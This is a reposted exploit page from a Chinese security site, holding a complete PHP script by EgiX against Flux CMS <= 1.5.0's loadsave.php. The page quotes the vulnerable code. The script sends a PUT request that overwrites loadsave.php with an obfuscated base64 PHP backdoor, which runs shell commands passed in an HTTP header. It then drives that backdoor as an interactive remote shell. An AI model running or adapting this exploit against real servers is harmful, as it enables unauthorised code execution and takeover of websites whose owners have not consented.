首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Flux CMS <= 1.5.0 (loadsave.php) Remote Arbitrary File Overwrite Exploit 来源：n0b0d13s[at]gmail[dot]com 作者：EgiX 发布时间：2008-06-10   <?php /* ------------------------------------------------------------------------ Flux CMS <= 1.5.0 (loadsave.php) Remote Arbitrary File Overwrite Exploit ------------------------------------------------------------------------ author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://www.flux-cms.org/ [-] vulnerable code in /webinc/bxe/scripts/loadsave.php 12. header("Content-Type: text/html"); 13. 14. $xmlfile = realpath($_GET['XML']); (...) 24. $basedir = dirname(dirname(__FILE__)); 25. 26. if (strpos($xmlfile,$basedir) !== 0) { 27.     die("you are not allowed to read/write this file (".$_GET['XML'].")"); 28. } 29. 30. //If saving, then REQUEST METHOD is PUT 31. // and we have to set the response code to 204 32. 33. if ($_SERVER['REQUEST_METHOD'] == "PUT") { 34.     $fd = fopen ($_GET['XML'], "w"); 35.     if ($fd) { 36.         // read sent content 37.         $content = file_get_contents("php://input"); 38.         //write content 39.         fwrite($fd,$content); 40.         fclose($fd); 41.         //sent correct HTTP header 42.         header("HTTP/1.1 204 No Content"); 43.         44.     } else { 45.         die ("couldn't write to ".$_GET['XML']); 46.     } 47. } an attacker might be able to overwrite an existing file with arbitrary raw POST data this poc try to overwrite loadsave.php itself due to restrictions at lines 24-28 */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print "\n[-] No response from ".$host.":80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } print "\n+-------------------------------------------------------------------+"; print "\n| Flux CMS <= 1.5.0 Remote Arbitrary File Overwrite Exploit by EgiX |"; print "\n+-------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage.....: php $argv[0] host path\n"; print "\nExample...: php $argv[0] localhost /"; print "\nExample...: php $argv[0] localhost /fluxcms/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = base64_decode( "PD9waHAgDQppZiAoaXNzZXQoJF9TRVJWRVJbSFRUUF9CQUNLXSkpIHsJDQoJJGRhdGEgPQ0KCSJQRDl3YUhBS0x5b3FDaUIwYUds" . "eklITmpjbWx3ZENCc2IyRmtjeUJoYm1RZ2MyRjJaWE1nV0UxTUlHUnZZM1Z0Wlc1MElIZHBkR2dnZEciIC4NCgkiaGxJR2hsYkhB" . "Z2IyWWdVRWhRQ2dvZ2FXNGdlVzkxY2lCamIyNW1hV2N1ZUcxc0lIbHZkU0IzYjNWc1pDQjBhR1Z1SUhkeWFYUmxDaUFLIiAuDQoJ" . "IklEeG1hV3hsSUc1aGJXVTlJa0pZWDNodGJHWnBiR1VpUGk5d1lYUm9MM1J2TDNsdmRYSXZiRzloWkhOaGRtVXVjR2h3UDFoTlRE" . "MXdZWCIgLg0KCSJSb0wzUnZMMk52Ym5SbGJuUXVlRzFzUEM5bWFXeGxQZ29LSUc1bFpXUnpJRkJJVUNBMExqTWdiM0lnVUVoUUlE" . "VXVJSE5wYldsc1lYSWciIC4NCgkiYVhNZ1lXeHpieUJ3YjNOemFXSnNaU0IzYVhSb0lGQklVQ0E4SURRdU13b3FMd29LYUdWaFpH" . "VnlLQ0pEYjI1MFpXNTBMVlI1Y0dVNklIIiAuDQoJIlJsZUhRdmFIUnRiQ0lwT3dvS0pIaHRiR1pwYkdVZ1BTQnlaV0ZzY0dGMGFD" . "Z2tYMGRGVkZzbldFMU1KMTBwT3dvdktpQjJaWEo1SUdOeSIgLg0KCSJkV1JsSUdGdVpDQnphVzF3YkdVZ2MyVmpkWEpwZEhrZ1ky" . "aGxZMnNLQ2lBZ0lDQjNaU0JoYkd4dmR5QnZibXg1SUdsdVkyeDFjMmx2YmkiIC4NCgkiQnZaaUJtYVd4bGN5d2dkMmhwWTJnS0lD" . "QWdJR0Z5WlNCemIyMWxkMmhsY21VZ2FXNGdkR2hsSUdScGNtVmpkRzl5ZVNCdmJtVWdiR1YyIiAuDQoJIlpXd0tJQ0FnSUdGaWIz" . "WmxJSFJvYVhNZ2MyTnlhWEIwTGlCWmIzVWdhR0YyWlNCMGJ5QmphR0Z1WjJVZ2RHaHBjd29nSUNBZ2NuVnNaUyIgLg0KCSJ3Z2FX" . "WWdlVzkxSUhkaGJuUWdkRzhnYVc1amJIVmtaU0JtY205dElITnZiV1YzYUdWeVpRb2dJQ0FnWld4elpTd2dZblYwSUcxaGEyVWci" . "IC4NCgkiYzNWeVpTd2dhWFFnWTJGdUozUWdjbVZoWkNCaGJua2djMlZ1YzJsMGFYWmxDaUFnSUNCbWFXeGxjeTR1Q2lvdkNpUmlZ" . "WE5sWkdseUlEIiAuDQoJIjBnWkdseWJtRnRaU2hrYVhKdVlXMWxLRjlmUmtsTVJWOWZLU2s3Q2dwcFppQW9jM1J5Y0c5ektDUjRi" . "V3htYVd4bExDUmlZWE5sWkdseSIgLg0KCSJLU0FoUFQwZ01Da2dld29nSUNBZ1pHbGxLQ0o1YjNVZ1lYSmxJRzV2ZENCaGJHeHZk" . "MlZrSUhSdklISmxZV1F2ZDNKcGRHVWdkR2hwY3kiIC4NCgkiQm1hV3hsSUNnaUxpUmZSMFZVV3lkWVRVd25YUzRpS1NJcE93cDlD" . "Z292TDBsbUlITmhkbWx1Wnl3Z2RHaGxiaUJTUlZGVlJWTlVJRTFGIiAuDQoJIlZFaFBSQ0JwY3lCUVZWUUtMeThnWVc1a0lIZGxJ" . "R2hoZG1VZ2RHOGdjMlYwSUhSb1pTQnlaWE53YjI1elpTQmpiMlJsSUhSdklESXdOQyIgLg0KCSJBS0NtbG1JQ2drWDFORlVsWkZV" . "bHNuVWtWUlZVVlRWRjlOUlZSSVQwUW5YU0E5UFNBaVVGVlVJaWtnZXdvZ0lDQWdKR1prSUQwZ1ptOXciIC4NCgkiWlc0Z0tDUmZS" . "MFZVV3lkWVRVd25YU3dnSW5jaUtUc0tJQ0FnSUdsbUlDZ2tabVFwSUhzS0lDQWdJQ0FnSUNBdkx5QnlaV0ZrSUhObGJuIiAuDQoJ" . "IlFnWTI5dWRHVnVkQW9nSUNBZ0lDQWdJQ1JqYjI1MFpXNTBJRDBnWm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1vSW5Cb2NEb3ZMMmx1" . "Y0hWMCIgLg0KCSJJaWs3Q2lBZ0lDQWdJQ0FnTHk5M2NtbDBaU0JqYjI1MFpXNTBDaUFnSUNBZ0lDQWdabmR5YVhSbEtDUm1aQ3dr" . "WTI5dWRHVnVkQ2s3Q2kiIC4NCgkiQWdJQ0FnSUNBZ1ptTnNiM05sS0NSbVpDazdDaUFnSUNBZ0lDQWdMeTl6Wlc1MElHTnZjbkps" . "WTNRZ1NGUlVVQ0JvWldGa1pYSUtJQ0FnIiAuDQoJIklDQWdJQ0JvWldGa1pYSW9Ja2hVVkZBdk1TNHhJREl3TkNCT2J5QkRiMjUw" . "Wlc1MElpazdDaUFnSUNBZ0lDQWdDaUFnSUNCOUlHVnNjMiIgLg0KCSJVZ2V3b2dJQ0FnSUNBZ0lHUnBaU0FvSW1OdmRXeGtiaWQw" . "SUhkeWFYUmxJSFJ2SUNJdUpGOUhSVlJiSjFoTlRDZGRLVHNLSUNBZ0lIMEsiIC4NCgkiZlNBS0x5OXZkR2hsY25kcGMyVWdhWFFu" . "Y3lCcWRYTjBJR0VnWjJWMElGSkZVVlZGVTFRS1pXeHpaU0I3Q2lBZ0lDQndjbWx1ZENCbWFXIiAuDQoJInhsWDJkbGRGOWpiMjUw" . "Wlc1MGN5Z2tYMGRGVkZzbldFMU1KMTBwT3dwOUNqOCsiOw0KCSRmZCA9IGZvcGVuKCJsb2Fkc2F2ZS5waHAiLCAidyIpOw0KCWZ3" . "cml0ZSgkZmQsIGJhc2U2NF9kZWNvZGUoJGRhdGEpKTsNCiAgICBmY2xvc2UoJGZkKTsNCglleGl0KCk7DQp9DQoke3ByaW50KF9j" . "b2RlXyl9LiR7cGFzc3RocnUoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKX0uJHtwcmludChfY29kZV8pfQ0KPz4=" ); $packet  = "PUT {$path}webinc/bxe/scripts/loadsave.php?XML=loadsave.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload; if (!preg_match("/204 No Content/i", http_send($host, $packet))) die("\n[-] Exploit failed...\n"); define(STDIN, fopen("php://stdin", "r")); while(1) { print "\nfluxcms-shell# "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $packet = "GET {$path}webinc/bxe/scripts/loadsave.php HTTP/1.0\r\n"; $packet.= "Host: {$host}\r\n"; $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; $packet.= "Connection: close\r\n\r\n"; $output = http_send($host, $packet); if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n"); $shell = explode("_code_", $output); print "\n".$shell[1]; } else break; } // backup the original script $packet = "GET {$path}webinc/bxe/scripts/loadsave.php HTTP/1.0\r\n"; $packet.= "Host: {$host}\r\n"; $packet.= "Back:\r\n"; $packet.= "Connection: close\r\n\r\n"; http_send($host, $packet); ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·iJoomla News Portal (Itemid) R ·Telephone Directory 2008 Arbit ·Galatolo Web Manager <= 1.0 Re ·Achievo <= 1.3.2 (fckeditor) A ·Black Ice Software Inc Barcode ·Black Ice Software Annotation ·Asterisk (SIP channel driver / ·Black Ice Software Annotation ·Black Ice Software Inc Barcode ·Yuhhu 2008 SuperStar (board) R ·Black Ice Software Inc Barcode ·JAMM CMS (id) Remote Blind SQL   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved